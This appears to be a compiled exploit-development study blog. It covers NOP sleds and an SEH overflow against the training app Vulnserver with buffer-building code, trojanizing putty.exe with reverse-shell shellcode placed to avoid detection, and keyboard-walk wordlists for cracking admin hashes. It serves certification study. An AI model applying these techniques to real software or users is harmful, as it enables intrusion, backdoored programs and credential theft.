Why do you need NOPs?

I’ve read a lot of things and taken both the OSCP and OSCE courses, yet I’ve never seen anyone really break down why we use NOP sleds. There are instances where they are used to line up shellcode to a particular offset, which is self-explanatory. However, there are cases where an exploit won’t work without them. Why is that?

Looking at the TRUN command in Vulnserver, it’s a relatively easy exploit. We begin crafting our overflow string, this time with no NOPs. We already established the EIP offset is 2003, and we’re using reverse shell shellcode generated by msfvenom. The only bad character identified is \x00, so we encode with the default x86/shikata_ga_nai encoder and specify the bad character. POC code for the exploit is available here.

No NOPs this time

In this instance, we are using the JMP ESP instruction located at 0x62501205 to jump to our shellcode. Before sending the exploit, ensure a breakpoint is set at this address. We send the exploit and step through it in the debugger. Take the jump to ESP and we see that we are properly lined up.

Sitting at ESP…

If we move forward one instruction at a time, the program crashes and shellcode does not execute. If we’re paying attention, we will see that part of our shellcode was overwritten with some weird instructions.

RET instruction is gone, shellcode overwritten…

So, back to the drawing board. Modify the string to add the NOPs in, and let’s look at execution.
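The two versions of the overflow string can be sketched as below. This is a minimal sketch, not the POC linked above: the "TRUN /.:/" prefix, the 16-byte sled length, and the placeholder shellcode bytes are assumptions for illustration, while the 2003-byte offset and the JMP ESP address come from the text.

```python
import struct

EIP_OFFSET = 2003        # offset to the saved return address (from the post)
JMP_ESP = 0x62501205     # JMP ESP address (from the post)


def build_trun_buffer(shellcode: bytes, nop_count: int = 0,
                      prefix: bytes = b"TRUN /.:/") -> bytes:
    """Build the overflow string, optionally with a NOP sled before the shellcode.

    The prefix is an assumption; use whatever your fuzzing results show.
    """
    padding = b"A" * EIP_OFFSET
    ret = struct.pack("<I", JMP_ESP)      # little-endian return address
    sled = b"\x90" * nop_count            # 0x90 = NOP
    return prefix + padding + ret + sled + shellcode


# Placeholder bytes standing in for the msfvenom output (hypothetical).
placeholder_shellcode = b"\xcc" * 8

no_sled = build_trun_buffer(placeholder_shellcode)
with_sled = build_trun_buffer(placeholder_shellcode, nop_count=16)
```

The only difference between the two strings is the run of 0x90 bytes between the return address and the shellcode, which is what gives the decoder room to work.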

NOPsled in place…

At this point we can see our shellcode at the end of the NOPs. If we continue execution, we will receive a shell. But at this point it’s important to step back and understand the process here.

Shellcode begins…

Starting at 0x00b7fa24 we see our shellcode, but what we actually see is the msfvenom decoding stub. The important part to note is the instruction at 0x00b7fa2b: FSTENV (28-BYTE) PTR SS:[ESP-C]. Floating point instructions are used here to get EIP onto the stack, which is useful for all sorts of reasons, but for our purposes it lets the decoder perform calculations relative to its own location. If we advance execution to 0x00b7fa2f (but don’t execute this instruction) we can see this play out.

Did not crash this time…

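So we use FXCH to manipulate the floating point registers, which records the address of that instruction in the FPU’s instruction pointer. Then we execute the FSTENV (28-BYTE) PTR SS:[ESP-C] instruction, which dumps the floating point environment into memory. It dumps 28 bytes of data starting at ESP-C, which in this case would be 0x00b7fa00. That write ends at 0x00b7fa1b, short of the shellcode at 0x00b7fa24, so it lands on the NOP sled. Without the sled the shellcode starts right at ESP, and the same write covers ESP-C through ESP+F, overwriting the first 16 bytes of the decoder while it is running. That is the crash we saw earlier. If we look at the stack, the memory address that the FXCH instruction was performed at is now at the top of the stack. The next instruction will pop this value into EBX, and now EBX will be used by the decoder for relative calculations. At this point, if we press F9 to continue execution (in Immunity…)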
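The arithmetic behind the FSTENV write can be checked with a short sketch. The ESP value is derived from the ESP-C address quoted above; the 32-byte decoder length is a hypothetical figure chosen only to have something to test against.

```python
FSTENV_SIZE = 28     # bytes written by the 28-byte FSTENV form
FSTENV_OFFSET = 0xC  # the decoder writes to [ESP-C]


def fstenv_write_range(esp: int) -> tuple:
    """Return (start, end) of the FSTENV write, end exclusive."""
    start = esp - FSTENV_OFFSET
    return start, start + FSTENV_SIZE


def clobbers(esp: int, code_start: int, code_len: int) -> bool:
    """True if the FSTENV write overlaps [code_start, code_start + code_len)."""
    start, end = fstenv_write_range(esp)
    return start < code_start + code_len and code_start < end


esp = 0x00b7fa0c                  # ESP-C == 0x00b7fa00 in the post
start, end = fstenv_write_range(esp)

DECODER_LEN = 32                  # hypothetical stub length, for illustration

# With the sled, the decoder starts at 0x00b7fa24, past the end of the write.
with_sled = clobbers(esp, 0x00b7fa24, DECODER_LEN)

# Without the sled, the decoder starts at ESP itself and gets overwritten.
without_sled = clobbers(esp, esp, DECODER_LEN)

print(hex(start), hex(end), with_sled, without_sled)
```

Any sled that pushes the decoder at least 16 bytes past ESP keeps it clear of the write, which is why a short sled is enough here.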

It works!

I find this very interesting to see in action. I happened on information about how these instructions worked when dealing with a stack alignment problem in another exploit. Understanding how the decoder worked could have saved me some time.

Vulnserver: LTER SEH Buffer Overflow

Vulnserver is an intentionally vulnerable application used for training in exploit development. It consists of several commands, some vulnerable and some not, and the user is intended to find and exploit these vulnerabilities. For many specific vulnerabilities, there are several ways to exploit them. In my preparation for the OSCE exam, I was able to find and exploit each command in turn. However, it wasn’t until reviewing the infamous HP NNM 7.5.1 exploit that I was able to exploit the LTER command in Vulnserver by overflowing the SEH address.

To start, we find the crash. I used boofuzz for this, with a template found on this blog site. The crash should occur fairly quickly.

boofuzz template for vulnserver

After fuzzing we replicate the crash manually by sending a metasploit pattern to identify the offset. We get the “LTER /.:/” prepend string from the fuzz results.

Sending a pattern of 5000 bytes

Ensure the application is open and attached to a debugger on the target machine. The application has crashed and we can see the MSF pattern overwriting several locations in memory. Inspecting the SEH chain shows us the SEH pointer is overwritten. Querying these values in the pattern_offset utility in MSF returns an offset of 3495 for NSEH, 3499 for SEH. Note, the offset for NSEH on Windows 2003 will be 3491, on Windows Vista it will be 3515. By sending a shorter buffer, you can overwrite EIP directly instead of overwriting the SEH pointer. This can be a useful exercise for dealing with character restrictions in a simpler problem.

SEH pointer is overwritten

Further testing shows that we have 28 bytes following SEH to test bad characters manually. While testing, we send the below string:

testing bad characters…

And we find some strange results:

Everything after 7F is mangled…

It wasn’t until doing the OSCE course that I really recognized what was happening here and some of the additional options I have. The characters after 7F are being mangled, but testing reveals that they are being mangled in a predictable way, basically subtracting 7F from any value greater than 7F. The end result is that we are left with a more or less alpha-numeric character set to work with.

The next step is to identify a “pop pop ret” pointer in the essfunc.dll module that consists of allowed characters. We can use mona or findjmp.exe to find this address, or just search in Immunity for “pop r32 pop r32 ret”, although that is the least readable of the three options. We add this address into our attack string at the SEH location.

pop pop ret found at 0x6250120b in essfunc.dll

We need more space to work with; 28 bytes is not enough to function with even without character restrictions. We can take a backwards jump, with a couple of modifications. For a normal backwards jump, we would use the opcodes eb XX, where XX is equal to the number of bytes we want to jump, minus 1, subtracted from 255 and converted to hex. So if we want to jump back 64 bytes we would use c0, and 128 bytes would be 80. We can’t use either of these, but if we use FF it will be converted to 80 when vulnserver.exe does its alpha-numeric conversion. Instead of using eb for a short jump, we can use 77 (JA) for a conditional short jump. This jump is taken only when the zero flag and the carry flag are both clear. We can put an operation in front of it, such as \x42, which translates to INC EDX. INC EDX clears the zero flag unless EDX wraps around to zero, which would take a very unlikely set of circumstances. Note that INC does not modify the carry flag, so the jump also depends on the carry flag already being clear at this point.
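The displacement rule and the character mangling can be sketched in a few lines. The mangle function below models the behaviour as described in this post (subtract 7F from anything above 7F); it is an assumption about vulnserver.exe based on that observation, not its actual code.

```python
def backward_rel8(distance: int) -> int:
    """Displacement byte for a short jump going back `distance` bytes.

    Same as 255 - (distance - 1); the jump is measured from the end of
    the two-byte jump instruction.
    """
    if not 1 <= distance <= 128:
        raise ValueError("a short jump reaches back at most 128 bytes")
    return (256 - distance) & 0xFF


def mangle(byte: int) -> int:
    """Model of the observed filter: values above 0x7F lose 0x7F."""
    return byte - 0x7F if byte > 0x7F else byte


jump_sent = bytes([0x77, 0xFF])                     # JA with FF as sent
jump_in_memory = bytes(mangle(b) for b in jump_sent)

print(hex(backward_rel8(64)), hex(backward_rel8(128)), jump_in_memory.hex())
```

Sending FF and letting the target turn it into 80 is what makes the maximum backward short jump reachable with an otherwise restricted character set.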

Backwards alphanumeric jump

We set nseh equal to “\x42\x77\xff\x42” and add it to the attack string. If we send this string and follow it in the debugger, then take the jump, we arrive at about 127 bytes of code we can use.
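Putting the pieces so far together, the attack string might be laid out as in the sketch below. It assumes the 3495/3499 offsets are measured from the first byte after the “LTER /.:/” prefix and that the total length stays at the 5000 bytes used for the pattern; the filler characters are arbitrary.

```python
import struct

NSEH_OFFSET = 3495             # from pattern_offset (this target OS)
SEH_OFFSET = 3499
POP_POP_RET = 0x6250120b       # pop pop ret in essfunc.dll (from the post)
NSEH = b"\x42\x77\xff\x42"     # INC EDX; JA back (FF becomes 80); INC EDX
TOTAL_LENGTH = 5000            # assumed: same length as the pattern sent


def build_lter_buffer(prefix: bytes = b"LTER /.:/") -> bytes:
    """Lay out filler, nSEH, SEH and trailing filler after the command prefix."""
    body = b"A" * NSEH_OFFSET
    body += NSEH
    body += struct.pack("<I", POP_POP_RET)   # little-endian SEH pointer
    body += b"C" * (TOTAL_LENGTH - len(body))
    return prefix + body


body_only = build_lter_buffer(prefix=b"")
seh_bytes = struct.pack("<I", POP_POP_RET)
```

Every byte of the SEH pointer is below 0x80, which is why this particular pop pop ret address survives the character conversion.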

Jump back into the buffer, giving us some breathing room…

Now that we have more space, we can sub-encode values. Sub encoding uses alpha-numeric values and SUB instructions to put specific values we need on the stack. As an example, we will take the value 0xe7ffe775 and sub encode it. First, subtract the value from 0xffffffff and then add 1. We get the value 1800188b. We can then break the bytes out into a table, as seen below. We must ensure that the values we pick add up to our bytes in the left column, but also that they are not in the list of bad characters for the application.

Table for manual sub encoding

To break this down, if we first zero out EAX, we can then perform these instructions (SUB EAX, 15521542; SUB EAX,015e0208; SUB EAX, 01500141) and then EAX will contain the value e7ffe775. Push this value on the stack, and now we have our decoded instructions on the stack. There are calculators online for doing this kind of encoding but it’s a good exercise to do it manually and learn how it is done.
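The sub-encoding arithmetic above can be verified with a small sketch. The allowed byte range of 0x01 to 0x7F is an assumption drawn from the bad character test earlier; adjust it to whatever your own testing shows.

```python
MASK = 0xFFFFFFFF


def sub_target(value: int) -> int:
    """Total that must be subtracted from zero to leave `value` in EAX."""
    return (0 - value) & MASK     # same as 0xffffffff - value + 1


def apply_subs(operands, eax: int = 0) -> int:
    """Simulate a chain of SUB EAX, imm32 instructions with 32-bit wraparound."""
    for operand in operands:
        eax = (eax - operand) & MASK
    return eax


def bytes_allowed(operand: int) -> bool:
    """Check every byte of the operand against the assumed allowed range."""
    return all(0x01 <= b <= 0x7F for b in operand.to_bytes(4, "little"))


WANTED = 0xe7ffe775
OPERANDS = [0x15521542, 0x015e0208, 0x01500141]   # from the post

print(hex(sub_target(WANTED)))     # total the three operands must add up to
print(hex(apply_subs(OPERANDS)))   # value left in EAX after the three SUBs
```

Running the operands through a check like this before assembling them catches both arithmetic slips and stray bad characters.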

My objective here was to jump all the way back to the beginning of the buffer so that I have 3000+ bytes to work with. The first thing we need to do is align the stack in our current buffer area. To do this we increase ESP by 1188 in order to place ESP right at the end of our current buffer, so that whatever we push onto the stack will get executed. We push the value of ESP onto the stack, pop it into EAX, adjust it using sub encoding, and then push the value of EAX onto the stack and pop it into ESP. Now, our stack is located at the end of our current buffer segment.

Sub encoded stack adjustment

From here, we want to jump backwards from the location of our stack to the beginning of our buffer. We do the math and see that we need to jump back 0xdb9. We would normally perform a near jump to FFFFF264, and the opcodes would translate to E9 64F2FFFF due to endianness. We will have to write this as two instructions on the stack to account for the uneven number of bytes, since we can only write 4 bytes at a time. We must zero out the EAX register before sub encoding instructions. We want to sub encode the values 64F2FFFF and E9414141 and push them on the stack in that order.
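Because the stack grows toward lower addresses, the order of the two pushes matters. The sketch below simulates the pushes to show what ends up in memory; the dword values are written as the 32-bit numbers that sit in EAX before each PUSH, so the byte sequence 64 F2 FF FF corresponds to the value 0xFFFFF264.

```python
import struct


def push_all(values) -> bytes:
    """Simulate successive PUSHes and return memory from the final ESP upward.

    Each push places its little-endian dword in front of (below) the
    previously pushed data.
    """
    memory = b""
    for value in values:
        memory = struct.pack("<I", value) + memory
    return memory


# First push the displacement, then the dword ending in the E9 opcode.
layout = push_all([0xFFFFF264, 0xE9414141])

print(layout.hex())   # bytes as the CPU will execute them, lowest address first
```

The three 41 bytes decode as INC ECX, so execution slides through them harmlessly before reaching E9 and taking the near jump.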

Sub encoding a near jump back to the beginning of our buffer

In this instance, I am using the same method muts used in the NNM exploit to zero out EAX. There are other methods; the one I normally like is pushing 41414141 onto the stack, popping it into EAX, and then XORing EAX with 41414141 again. If we execute these instructions, we see our jump get revealed at our stack location.
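Both ways of zeroing EAX can be sketched as byte sequences. The XOR variant follows the description above. The pair of AND masks is an assumption: the post does not show the values used, and the two below are simply a pair with no bits in common.

```python
import struct


def xor_zero_eax() -> bytes:
    """PUSH 0x41414141; POP EAX; XOR EAX, 0x41414141."""
    value = struct.pack("<I", 0x41414141)
    return b"\x68" + value + b"\x58" + b"\x35" + value


# Assumed mask pair: any two values whose bitwise AND is zero will do.
AND_MASK_1 = 0x554E4D4A
AND_MASK_2 = 0x2A313235


def and_zero_eax() -> bytes:
    """AND EAX, mask1; AND EAX, mask2 (leaves zero whatever EAX held)."""
    return (b"\x25" + struct.pack("<I", AND_MASK_1) +
            b"\x25" + struct.pack("<I", AND_MASK_2))


xor_stub = xor_zero_eax()
and_stub = and_zero_eax()

print(xor_stub.hex(), and_stub.hex())
```

Both stubs stay within the 0x01 to 0x7F range, so either survives the character conversion; the XOR version is one byte longer and touches the stack.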

We’re jumping back and…

And now we are back at the beginning of the buffer and have a ton of buffer space for code execution. We’re actually 8 bytes into our buffer here, which is important to note for keeping our attack string aligned.

Now we’re at 00b7f23c

Now we have plenty of space. Msfvenom can generate alpha-numeric shellcode, so at this point we’re home free. Or almost. There are two other factors to consider. The first is that msfvenom-generated alpha-numeric shellcode is prepended by a non-alpha-numeric stub which finds the shellcode’s location in order to do operations relative to the start of the shellcode. This is a problem in this case. Offsec is nice enough to document the BufferRegister feature of msfvenom, which tells the shellcode which register holds the address of your buffer. In order for this to work, we need to line up a register with our shellcode. So we adjust ESP using the same method as before, and we can see below that our stack now lines up with our buffer, so the BufferRegister setting in msfvenom will work. Our shellcode is waiting for us 900 bytes and change away, and we should have a shell.

Lined up buffer.

You’ll note that this doesn’t work, and this is due to stack alignment. The stack is expected to be DWORD-aligned on x86, which means that the address in ESP must be divisible by 4. Since ESP has been set to an address not evenly divisible by 4, the shellcode misbehaves and execution falls apart. So we adjust the stack to a location divisible by 4 and ensure we adjust all of our padding as well, and that’s it.
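Checking and fixing the alignment is simple arithmetic, sketched below. The misaligned address is a hypothetical example; 0x00b7f23c is the address from the earlier screenshot caption.

```python
def is_dword_aligned(address: int) -> bool:
    """True when the address is a multiple of 4."""
    return address % 4 == 0


def align_down(address: int) -> int:
    """Round an address down to the nearest multiple of 4."""
    return address & ~0x3


def padding_to_align(address: int) -> int:
    """Number of filler bytes needed to reach the next multiple of 4."""
    return (-address) % 4


misaligned = 0x00b7f23e   # hypothetical ESP value, for illustration only

print(is_dword_aligned(0x00b7f23c), is_dword_aligned(misaligned))
print(hex(align_down(misaligned)), padding_to_align(misaligned))
```

Whichever direction you move ESP, the padding in the attack string has to change by the same amount so the shellcode still starts where the register points.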

Adjusted shellcode

And…

It works.

I have the working code posted here. It should be noted that I chose ESP, but I believe you can use any register.

Backdooring Portable Executables: Code Caves and threading failure

To start off, let’s take care of the issue with the code cave. We don’t want to add another section to the PE, we want to modify the executable as little as possible to prevent possible detection. We can use the Memory Map tool in Immunity Debugger to manually review the sections for large, uninterrupted spaces of nulls. This blog shows a pretty succinct process for backdooring executables (and is my primary source for the next portion on threading) and introduces a tool called Cminer. Using Cminer on putty.exe, we find two potential caves:

Using Cminer to locate code caves in putty.exe of 350 bytes or more

These are actually rather small at 500ish bytes apiece, and may not work for encoded shellcode without a jump from one cave to the other. But unencoded shellcode comes to about 350 bytes, so this is plenty of space. Also note, manual inspection of the memory space will show that there is a ton more null space in the .xdata segment; it does not end at 0x4b8800. Whether this is some kind of issue with the tool or user error, I’m not sure. The good news is that if needed we can fit plenty of encoded shellcode in there.

The bad news: I tested several different open source tools and none really provided reliable results. In fact, manual inspection revealed huge portions of null space in every section of the putty.exe PE. So, yeah, I don’t know. It is probably a rabbit hole that would be good to go down eventually, to figure out how to do this accurately using automation. For right now, manual inspection is needed, but Cminer did accurately provide two code cave locations, so there is that. It should be noted that even though there are huge areas of null space, trying to overwrite some of those areas will cause the debugger to complain, so finding a suitable area is a matter of trial and error.
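For a rough idea of what a cave search does, here is a minimal sketch that scans raw bytes for runs of nulls. It is not how Cminer works, and it reports file offsets rather than virtual addresses; it also ignores section boundaries and permissions, so a hit still has to be checked by hand in the debugger. The 350-byte minimum matches the search used above.

```python
def find_null_runs(data: bytes, min_size: int = 350):
    """Return (offset, length) for each run of null bytes of at least min_size."""
    caves = []
    run_start = None
    for index, byte in enumerate(data):
        if byte == 0:
            if run_start is None:
                run_start = index          # a new run begins here
        else:
            if run_start is not None and index - run_start >= min_size:
                caves.append((run_start, index - run_start))
            run_start = None
    # Handle a run that extends to the end of the data.
    if run_start is not None and len(data) - run_start >= min_size:
        caves.append((run_start, len(data) - run_start))
    return caves


# Small synthetic example: one 400-byte run qualifies, the 100-byte run does not.
sample = b"\x90" * 10 + b"\x00" * 400 + b"\xcc" + b"\x00" * 100
sample_caves = find_null_runs(sample)
print(sample_caves)
```

To try it on a real file, read the executable with open(path, "rb").read() and pass the bytes in; mapping the offsets back to sections and addresses is left to a PE viewer.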

So uhhh… about that nullspace ending at 0x004b8800…

From here it proceeds the same as with the previous example. Step into the code cave, save the program state, place the shellcode (this time generated using msfvenom with EXITFUNC=seh), adjust the stack, and close it out by loading the saved program state from the stack and proceeding with program execution.

For threading, I used a few different resources. The easiest to read was here, but I was not successful. The OSCE course starts in two days so I’m not going to spend any more time on it. I’m close, but it’s not quite working out.

Backdooring Portable Executables: Fixing execution

The best part of writing things down here is that inevitably 5 minutes later, I find someone with the same problem. When backdooring putty.exe, I came across an issue with the EXITFUNC code appended onto the end of msfvenom code. The code ends with a CALL EBP, which goes off into the shellcode and eventually to ntdll.KiFastSystemCallRet where it terminates the program.

We got a shell, but the program terminates here…

Not ideal. So one solution was to change that CALL EBP instruction to NOPs. Skipping that call allows execution to proceed, everything is right with the world, except the gnawing feeling that it’s just gross.

so dirty…

But hey, it works. Turns out though, Capt Meelo had the same issue and came up with a couple of solutions. His first solution was the same as the one up here, turn that CALL instruction into NOPs and the program executes as expected. Kind of reassuring to see that someone came up with the same fix, even if it’s not ideal. But his second solution was kind of a head-slapper moment. Just create the shellcode using the EXITFUNC=seh option:

generating shellcode

A closer inspection of the shellcode reveals they’re identical, as you’d expect since looking at the metasploit github shows you that EXITFUNC is determined by code tacked on to the end of the shellcode. The real difference is in a value moved into EBX at 0x004c3127 shown below.

Left: EXITFUNC=seh Right: EXITFUNC=none

So, lesson learned. If there’s an issue with a particular part of the shellcode, maybe try all the options associated with that shellcode first before manually NOPing out instructions. Using EXITFUNC=seh resumes execution like a charm. There is one remaining issue, though. Simple shellcode like popping calc will always work, but in the case of a reverse shell we find that the program does not execute unless a listener is configured on the correct port. This is not ideal. So on the agenda: redirecting to existing null space in the code rather than adding a section, and fixing the last remaining execution issue.

Backdooring Portable Executables

Prepping for OSCE, lots of shellcoding and debugging going on. Shellcoding is particularly frustrating today so to change gears for a bit I’m going to write up backdooring PEs. Examples are x86, tested on Windows XP SP3, using the x86 putty executable available here. I also used Stud_PE, Immunity Debugger, and a great blog post over at Sector876 that helped me get the basics down. There’s a couple of different methods, let’s start with the first, we’ll add a section.

First, let’s start by opening the program in Stud_PE. Select the Sections tab and you can see all of the sections present in the executable. Right click and choose “New Section” and adjust the size. Ensure you’ve added enough space to fit your shellcode in, and select the option to fill the space with null bytes. After you save, run the executable to ensure it still functions and nothing is broken.

adding a section with Stud_PE

Open the executable in the debugger and inspect the sections, in Immunity this is easily found in the Memory Map tab. If you inspect the section, you should find it filled with null bytes. Note the memory address that the section starts at, in this instance we see 0x004c3000.

our new section, all filled with nulls

We will need to redirect program execution to this address, where we will eventually put shellcode. For now, note the existing instructions at the program’s entry point. We will need these for redirecting back to normal execution for the program.

our initial instructions

After saving these addresses, it is time to redirect execution. In Immunity we do this by right clicking the instruction and selecting Assemble, then inputting our jump instruction. We want to jump to 0x004c3000 in this case.
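Immunity works out the jump bytes for you, but the calculation is worth seeing once. In the sketch below the entry point address is hypothetical (the post does not state it); only the 0x004c3000 destination comes from the text.

```python
import struct


def encode_near_jmp(source: int, destination: int) -> bytes:
    """Encode JMP rel32 placed at `source` that lands on `destination`.

    The displacement is measured from the end of the 5-byte instruction.
    """
    displacement = destination - (source + 5)
    return b"\xE9" + struct.pack("<i", displacement)


ENTRY_POINT = 0x00401000    # hypothetical entry point, for illustration only
NEW_SECTION = 0x004c3000    # start of the added section (from the post)

jmp_bytes = encode_near_jmp(ENTRY_POINT, NEW_SECTION)
print(jmp_bytes.hex())
```

The jump is five bytes long, so it can overwrite more than one original instruction. That is why the original entry point instructions need to be noted before assembling it.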

assembling our jmp instruction

After assembling, the instruction should update in the debugger to exactly what we need.

jmp to…

Hit F7 in Immunity to move to the next instruction and you should see the new section we added, filled with nulls.

nulls, nulls everywhere

The first thing that should be done at this point is to save the executable. After saving, in the new section overwrite the first two instructions with PUSHAD and PUSHFD instructions. This saves the program state before we pass it our shellcode. Press F7 twice to move ahead and then note the location of ESP. We will need this location after the shellcode to adjust the stack prior to normal program execution. In this instance, ESP is at 0x0012FFA0 following the two instructions added.

ready for shellcode now

Use msfvenom to create shellcode. In this instance we’re creating a reverse tcp shell for Windows in hex format, no bad chars specified. In Immunity, this is placed in the executable by selecting enough memory locations to hold our shellcode starting with the instruction following the PUSHFD, then right clicking and performing a binary paste.

generating shellcode

Once the shellcode is pasted in, place a breakpoint on the last instruction of the shellcode and press F9 to continue execution. Note that if the shellcode is a reverse shell, unless you have a listener set up it will take execution off into an exception, and that you’ll have to close the listener to hit your breakpoint. Once at the breakpoint, note the address at ESP. In this case it is 0x0012fd9c.

ESP location after shellcode execution

To determine the ESP offset, we subtract the ending ESP value from the initial value, so 12ffa0 – 12fd9c, and our offset is 0x204. In order to get ESP back where it belongs for normal program execution, we need to add 0x204 to ESP, so we right click the instruction immediately following the shellcode and input ADD ESP, 0x204. The next two instructions should be POPFD followed by POPAD to resume the program’s saved state from before the shellcode.
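The wrapper around the shellcode can be sketched as bytes. The ESP values are the ones recorded above; the single NOP standing in for the shellcode is a placeholder, and the restored entry point instructions and the jump back to normal execution are not included.

```python
import struct

PUSHAD = b"\x60"   # save general purpose registers
PUSHFD = b"\x9c"   # save flags
POPFD = b"\x9d"    # restore flags
POPAD = b"\x61"    # restore general purpose registers


def esp_offset(esp_before: int, esp_after: int) -> int:
    """How far the shellcode moved ESP down from its saved position."""
    return esp_before - esp_after


def add_esp(amount: int) -> bytes:
    """Encode ADD ESP, imm32."""
    return b"\x81\xc4" + struct.pack("<I", amount)


def wrap_shellcode(shellcode: bytes, esp_before: int, esp_after: int) -> bytes:
    """Save state, run the shellcode, realign ESP, restore state."""
    fixup = add_esp(esp_offset(esp_before, esp_after))
    return PUSHAD + PUSHFD + shellcode + fixup + POPFD + POPAD


offset = esp_offset(0x0012FFA0, 0x0012FD9C)
stub = wrap_shellcode(b"\x90", 0x0012FFA0, 0x0012FD9C)  # placeholder shellcode
print(hex(offset), stub.hex())
```

The offset depends on the shellcode, so it has to be measured again in the debugger whenever the payload changes.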

Perfect! Or was it…

At this point, it doesn’t work. You get your shell, the program doesn’t open, you close your shell, the program crashes. Frustrating. What we want is for the program to open and for you to get your shell at the same time. And for it to not crash when we close out of our shell. First things first. The opening issue has already been solved for us.

The offending code

So we found it. It’s near the bottom. The blog linked above links to the metasploit github, where you can find it for yourself. So we update it…

Easy enough

Still not quite right though, normal program execution doesn’t happen. Over at the metasploit github page, you can view the code for the exitfunc portion. This code is appended to the end of your msfvenom-generated code even if you choose EXITFUNC=none, right at the end. Check out this part in particular:

very last line of your shellcode

If you trace it in the debugger, your shellcode calls EBP which takes it off back into the shellcode and eventually out into ntdll.KiFastSystemCallRet which… ok, turning into a rabbit hole. Researching this, figuring out why it is doing this, is a priority. But for right now, quick and dirty, oh so dirty, just overwrite that call with NOPs and it works.

this is a gross solution and I should feel bad…

On the agenda is creating a backdoor using existing null space within the application and figuring out this business with the EXITFUNC in msfvenom.

program’s running…
shell’s working… it’s still gross though

kwprocessor and princeprocessor

I ran across this tool while doing Rastalabs. It’s kwprocessor, designed to help build keyboard walks for wordlists. It is actually pretty easy to use and can produce some quality wordlists for keywalks, and given how common those are in the operational environment it’s a good tool to have.

Installation is easy, just run “make”. In order to build for a Windows environment, ensure mingw-w64 is installed and run “make windows”. This will produce both 32 and 64 bit executables for Windows. I didn’t have much luck using the Windows version, the output was not what you would expect. I suspect this is due to formatting issues of the inputs to kwp (discussed below) but did not test that.

The help function is available using the --help flag, and it shows you how to format the command and manipulate the output. There are two basic options in the help: keyboard and keywalk. The keyboard options specify which characters will be included. The keywalk options specify the directions the keywalks will be generated in.

The default values are specified on the right, and for the boolean values (the keyboards and keywalks) anything with a 1 is run by default. By default the command outputs to STDOUT, so you can redirect the output to a file if you are looking to add to an existing file rather than create one from scratch. Changes to the defaults must be specified individually, so a typical command might look like this:

./kwp -s 1 -3 1 -4 0 -7 1 -9 1 basechars/full.base keymaps/en-us.keymap routes/4-to-4-exhaustive.route -o /opt/test_wordlists/list1.txt

There are three required parameters for running kwp: basechars, keymap, and route. Basechars are just that, the base characters that the keyboard walk will start from. There are two built-in options: full.base and tiny.base.  The tiny base seems extremely small, but given how often passwords comprised of keyboard walks begin with these characters it is easy to see how it would be effective.

Several different keymaps are provided. Keymaps are files containing maps of locations of keys on language-specific keyboard layouts. A few common languages are given, but the format is simple enough that if necessary it could be changed. The keymap is the foundation that the list is built from, so choosing the correct keymap is critical.

Routes are the last, maybe most important, parameter to pass the command. Atom, the creator of kwprocessor, breaks routes down better than I ever could in the github readme. An important note on routes is that the two largest routes, 2-to-16-max-4-direction-changes.route and 2-to-32-max-5-direction-changes.route, don’t work for me on Linux. On Windows I was able to get the routes to work, however the previously mentioned formatting issues rendered the wordlist unusable. I think some troubleshooting could solve the format issue, but it isn’t necessary.

A good strategy for using the tool is not to create the largest wordlist possible, but rather to create smaller wordlists and combine them into larger ones. A real world example of a keyboard walk I have seen is 1qaz@WSX. This is actually a fairly simple password, but it is the kind of thing administrators use because it is easily remembered and meets all the password complexity requirements. A single list that contains this password would probably be enormous and tricky to generate, because the walk requires jumps. Better to create lists of smaller words that can be more easily combined. I started by creating a custom basechars file to ensure that I am only starting from the left side of the keyboard.

Next I created a wordlist that would include all the four character walks from the left side of the keyboard that make sense. To me anyway, and based on my experience; there’s not much science behind my process here.

My objective is to get the smallest possible wordlist to ensure that the list remains usable with a combinator. I have some results here from several different passes through kwprocessor in order to minimize the list and finally sorted to remove any duplicates.

Atom has another tool, princeprocessor, which can help to combine words. This is something I’m still working on, and princeprocessor takes some trial and error to avoid making enormous wordlists. But I was able to make it work and generate a wordlist of eight character keywalks which would include keywalks not easily generated by kwprocessor due to the key jumps.
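To illustrate the idea of combining short walks, here is a minimal sketch that pairs every word from one list with every word from another. This is a plain two-list combination, not princeprocessor’s algorithm, and the two tiny wordlists are hypothetical stand-ins for kwprocessor output.

```python
from itertools import product


def combine(left_words, right_words):
    """Concatenate every word in left_words with every word in right_words."""
    return [left + right for left, right in product(left_words, right_words)]


def keyspace(left_words, right_words) -> int:
    """Number of candidates the combination will produce."""
    return len(left_words) * len(right_words)


# Hypothetical four character walks, unshifted and shifted.
lower_walks = ["1qaz", "2wsx", "3edc"]
shifted_walks = ["!QAZ", "@WSX", "#EDC"]

candidates = combine(lower_walks, shifted_walks)
print(keyspace(lower_walks, shifted_walks), "1qaz@WSX" in candidates)
```

The candidate count is the product of the list sizes, which is why trimming the four character lists pays off so quickly once they are combined.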

This created a list that had our example password above, but was also small enough that we would be able to work with it on fairly limited hardware.

This is only a start. My objective is to use these tools to be able to generate on the fly 16 character keyboard walks that can be used on mid-range hardware to crack admin hashes. The problem is that the possible number of combinations goes up so quickly that it would make this very difficult for large wordlists. You can see the keyspace in princeprocessor for yourself prior to running the tool.

The next steps are to further reduce the size of the initial wordlist, take out uncommon or unlikely characters, take out words that wouldn’t meet common password complexity requirements. This is an ongoing project but one that I feel will ultimately be worthwhile on red team missions. The more refined I can get the initial list, the better the end product will be.
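One of those reduction steps, dropping words that would not meet a complexity policy, could look like the sketch below. The policy itself (minimum length 8, at least 3 of 4 character classes) is an assumption for illustration; use whatever the target environment enforces.

```python
import string


def character_classes(word: str) -> int:
    """Count how many of lower, upper, digit and symbol classes appear."""
    return sum([
        any(c.islower() for c in word),
        any(c.isupper() for c in word),
        any(c.isdigit() for c in word),
        any(c in string.punctuation for c in word),
    ])


def meets_policy(word: str, min_length: int = 8, min_classes: int = 3) -> bool:
    """Assumed policy: long enough and drawing on enough character classes."""
    return len(word) >= min_length and character_classes(word) >= min_classes


words = ["1qaz@WSX", "1qaz2wsx", "qazwsxed", "!QAZ2wsx"]
kept = [word for word in words if meets_policy(word)]
print(kept)
```

Filtering before combining is cheaper than filtering afterwards, but a four character piece can fail the policy on its own and still be part of a valid eight character walk, so the filter belongs on the combined list.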

Um

Things got so busy I forgot I had this. Luckily I remembered when I had a bunch of stuff I needed to write down somewhere accessible. How fortunate.

OSCP – Day Zero

Today is the day, I just received all my materials and am setting everything up. I should be able to get at least a couple of productive hours in tonight and then another few tomorrow.

